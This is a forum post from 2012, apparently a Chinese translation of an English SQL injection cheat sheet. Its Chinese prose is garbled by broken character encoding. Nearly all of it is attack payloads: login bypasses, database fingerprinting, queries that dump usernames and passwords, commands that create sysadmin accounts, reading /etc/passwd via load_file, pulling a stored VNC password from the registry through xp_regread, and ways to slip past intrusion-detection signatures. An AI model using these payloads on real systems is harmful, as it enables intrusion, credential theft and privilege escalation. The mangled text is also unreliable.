��̳ › web app��͸����::��Web App penetration testing�� › SQLע�䷭��

admin ������ 2012-9-15 14:34:03

SQLע�䷭��

SQLע������
�������ߣ� zeroday@blacksecurity.org

�������ߣ�Ư���ij���

1������

2��©������

3���ռ���Ϣ

4����������

5����ȡ����

6���������ݿ��ʺ�

7��MYSQL����ϵͳ��������

8������������������

9����ע����л�ȡVNC����

10���ӱܱ�ʶ�����ź�

11����Char()����MYSQL����ȷ����ƭ

12����ע���ӱܱ�ʶ�����ź�

13��û�����ŵ��ַ���



1����������ֻ����80�˿ڣ����Ǽ����϶�����Ա��Ϊ�������򲹶���

��õķ�������ת����վ������SQLע�������ձ����վ��������֮һ��

�㹥����վ���򣬣�ASP,JSP,PHP,CGI..���ȷ����������ڷ����������еIJ���ϵͳ�õĶࡣ

SQLע����һ��ͨ����ҳ����һ����ѯ�������һ��ָ�������ƭ�ķ������ܶ�վ�㶼�Ǵ��û����û�������������email��ȡ�û��IJ�����

���Ƕ�ʹ��SQL��ѯ���



2���������ü򵥵Ľ��г��ԡ�

- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
��Щ�Ǽ򵥵ķ������������£�

- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--



3���ռ���Ϣ

- ' or 1 in (select @@version)--
- ' union all select @@version--/*�������
��Щ���ҵ������������ϵͳ����������ʵ�汾��



4����������

Oracle��չ
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL���ݿ⣬ C:\WINDOWS>type my.ini�õ�root����
-->mysql.user
-->mysql.host
-->mysql.db

MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases




5.��ȡ����

';begin declare @var varchar(8000) set @var=':' select

@var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6.�������ݿ��ʺ�

10��            MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'��Ϊ���ݿ����Ա

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access
CRATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'

Oracle
CRATE USER name IDENTIFIED BY pass123
      TEMPORARY TABLESPACE temp
      DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;



7. MYSQL����ϵͳ��������

- ' union select 1,load_file('/etc/passwd'),1,1,1;�����õ�load_file()����



8.����������������



-      ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--



9����ע����л�ȡVNC����

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',/*VNC4·�����в�ͬ
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--



10���ӱܱ�ʶ�����ź�

Evading ' OR 1=1 Signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3




11����Char()����MYSQL����ȷ����ƭ

��������ע�䣨string = "%"��

--> ' or username like char(37);

������ע��(string="root"):

��      ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->'unionselect 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));





12. ��ע���ӱܱ�ʶ�����ź�

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle)    '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')




13.û�����ŵ��ַ���

--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

�ղ� ���� ����

�鿴�����汾: SQLע�䷭��